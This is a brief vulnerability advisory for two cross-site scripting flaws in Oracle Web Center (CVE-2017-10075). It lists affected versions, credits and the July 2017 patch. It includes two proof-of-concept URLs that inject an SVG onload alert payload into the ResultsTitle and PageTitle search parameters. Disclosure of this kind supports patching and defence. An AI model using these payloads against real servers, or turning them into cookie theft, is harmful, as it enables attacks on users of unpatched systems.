Oracle Web Center XSS
Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: HighRemote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2
Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana
Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Description
========================================================================================
Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center,
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.
Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>
Solution
========================================================================================
Apply Oracle CPU July 2017
#Xc0re Security Research Group Archive